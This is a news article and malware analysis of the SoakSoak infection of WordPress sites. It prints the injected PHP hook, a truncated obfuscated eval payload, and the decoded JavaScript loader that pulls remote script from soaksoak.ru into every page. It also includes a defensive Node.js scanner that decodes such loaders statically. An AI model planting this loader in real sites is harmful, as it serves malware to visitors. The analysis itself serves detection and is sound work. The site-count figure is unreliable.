100,000 WordPress websites hit: the SoakSoak malware has arrived
WordPress is a blog platform developed in PHP. You can set up your own blog and use WordPress as a content management system (CMS). WordPress security vulnerabilities have surfaced frequently in recent months, including webshells hidden in free themes that affect well-known CMS systems such as WordPress, and an XSS vulnerability in WordPress versions earlier than 4.0. Now a widely spread piece of malware has infected more than 100,000 WordPress websites, and the number is still increasing.
Google blacklists over 11,000 domain names
The news first reached the WordPress community on Sunday morning, because Google had blacklisted more than 11,000 domain names. These websites had all been attacked by the latest malware. The software came from SoakSoak.ru, so it is named the SoakSoak malware. As more than 0.7 billion of the websites on the Internet use WordPress, such malware has a huge impact.
Once infected, a website behaves abnormally, including redirecting visitors to SoakSoak.ru. Users accessing the website may also have malicious programs downloaded automatically. Google has blacklisted 11,000 websites that may be infected with viruses.
Malware Analysis
The SoakSoak malware modifies the wp-includes/template-loader.php file:
<?php
function FuncQueueObject()
{
    wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
As a result, the file wp-includes/js/swobject.js is loaded on every page. The swobject.js file contains the encoded (obfuscated) malicious JavaScript code:
eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
Decoded code:
(function(){
    //var ua = navigator.userAgent.toLowerCase();
    //if (ua.indexOf('chrome') != -1) return;
    var head=document.getElementsByTagName('head')[0];
    var script=document.createElement('script');
    script.type='text/javascript';
    script.src='http://soaksoak.ru/xteas/code';
    script.id='xxyyzz_petushok';
    head.appendChild(script);
}());
Once the malicious code is decoded and executed, it loads JavaScript from the SoakSoak.ru domain: hxxp://soaksoak.ru/xteas/code
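The decoding step described above can be done statically, without ever running the payload. The following Node.js script is an added example, not code from the original article or from Sucuri: it finds eval(decodeURIComponent(...)) calls in a script file's text, decodes the string without executing it, and reports embedded URLs plus the two indicators named in this article. The function names, the malware.example domain and the first sample are constructed for illustration.

```javascript
// Static scan for eval(decodeURIComponent("...")) loaders: decode, never execute.
const INDICATORS = ['soaksoak.ru', 'xxyyzz_petushok']; // both taken from this article
const CALL_RE =
  /eval\s*\(\s*decodeURIComponent\s*\(\s*(["'])([\s\S]*?)\1\s*\)\s*\)/g;

// Decode %XX escapes. decodeURIComponent throws URIError on a truncated or
// malformed string (such as "%.."), so fall back to a tolerant per-escape pass.
function safeDecode(encoded) {
  try {
    return decodeURIComponent(encoded);
  } catch (err) {
    return encoded.replace(/%([0-9A-Fa-f]{2})/g,
      (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  }
}

// Return one finding per obfuscated call found in the file text.
function scanScript(source) {
  const findings = [];
  for (const m of source.matchAll(CALL_RE)) {
    const decoded = safeDecode(m[2]);
    findings.push({
      offset: m.index,
      decoded,
      urls: decoded.match(/https?:\/\/[^\s'"<>)]+/gi) || [],
      indicators: INDICATORS.filter((i) => decoded.toLowerCase().includes(i)),
    });
  }
  return findings;
}

// Constructed sample: a partly encoded loader pointing at a reserved test domain.
const CONSTRUCTED_SAMPLE =
  'var swf = {};\n' +
  'eval(decodeURIComponent("script.src%3D%27http%3A%2F%2Fmalware.example%2Fcode%27%3B"));\n';

// Excerpt of the truncated payload shown in this article, ".." elision included.
const PAGE_EXCERPT =
  'eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..' +
  '72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B"));';

for (const sample of [CONSTRUCTED_SAMPLE, PAGE_EXCERPT]) {
  for (const f of scanScript(sample)) {
    console.log(f.offset, JSON.stringify(f.decoded), f.urls, f.indicators);
  }
}
```

The same function can be pointed at the text of any .js file under a WordPress install; a hit on either indicator means the file should be compared against a clean copy of the same WordPress release.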
Detection and Prevention
It is unclear how the malware infects websites. If you use WordPress and are worried that your website is infected, Sucuri provides a free website scan to check whether it is.